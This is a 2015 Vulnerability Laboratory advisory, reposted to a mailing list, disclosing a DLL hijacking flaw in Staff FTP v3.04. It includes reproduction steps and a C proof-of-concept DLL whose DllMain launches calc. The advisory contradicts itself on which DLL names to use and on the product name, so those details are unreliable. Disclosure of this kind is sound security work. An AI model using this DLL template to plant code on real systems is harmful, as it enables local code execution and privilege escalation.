[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Staff FTP v3.04 Software - DLL Hijacking Vulnerability



Document Title:
===============
Staff FTP v3.04 Software - DLL Hijacking Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1499


Release Date:
=============
2015-05-19


Vulnerability Laboratory ID (VL-ID):
====================================
1499


Common Vulnerability Scoring System:
====================================
6


Product & Service Introduction:
===============================
Staff-FTP is an ftp-client which uses the common File-Transfer-Protocol to upload or download files from/to the internet. Among the standard options like 
up/download, query, sitemanager, browseable windows and almost every other options you will find in other ftp-clients, you will get some special options like.

(Copy of the Homepage: http://www.gsa-online.de/products-staffftp.php)


Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a local dll hijacking vulnerability in the official Staff-FTP v3.04 software.


Vulnerability Disclosure Timeline:
==================================
2015-05-19: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
GSA
Product: Staff FTP - Software 3.04


Exploitation Technique:
=======================
Local


Severity Level:
===============
High


Technical Details & Description:
================================
A local dll injection vulnerability has been discovered in the official Staff-FTP v3.04 software.
The issue allows local attackers to inject code to vulnerable libraries to compromise the process or to gain higher access privileges.

The windows software is vulnerable to dll hijacking attacks. The vulnerability is located in the netapi32.dll and dwmapi.dll file extensions.  
The software does not specify the fully qualified path to a dynamic-linked libraries (netapi32.dll and dwmapi.dll). The vulnerable version affects 
the Wise-FTP v3.04 software. The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability 
scoring system) count of 6.0. 

Vulnerable Software:
[+] Staff-FTP

Vulnerable Version(s):
[+] v3.04

Vulnerable Libraries:
[+] netapi32.dll
[+] dwmapi.dll


Proof of Concept (PoC):
=======================
The dll hijack vulnerability can be exploited by local attackers with restricted system user account and without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the local vulnerability ...
1. Compile dll and rename to Linkinfo.dll or mpr.dll
2. Copy Linkinfo.dll to C:\Program Files\Staff-FTP
3. Launch Staff-FTP

PoC: Exploit 
#include <windows.h>
 
int alpdaemon()
{
  WinExec("calc", SW_SHOW);
  exit(0);
  return 0;
}
 
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  alpdaemon();
  return 0;
}


Security Risk:
==============
The security risk of the local dll inject web vulnerability in the wise ftp software is estimated as high. (CVSS 6.0)


Credits & Authors:
==================
metacom


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@xxxxxxxxxxxxxxxxxxxxx 	- research@xxxxxxxxxxxxxxxxxxxxx 	       		- admin@xxxxxxxxxxxxxxxxx
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@xxxxxxxxxxxxxxxxxxxxx or research@xxxxxxxxxxxxxxxxxxxxx) to get a permission.

				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@xxxxxxxxxxxxxxxxxxxxx
PGP KEY: http://www.vulnerability-lab.com/keys/admin@xxxxxxxxxxxxxxxxxxxxx%280x198E9928%29.txt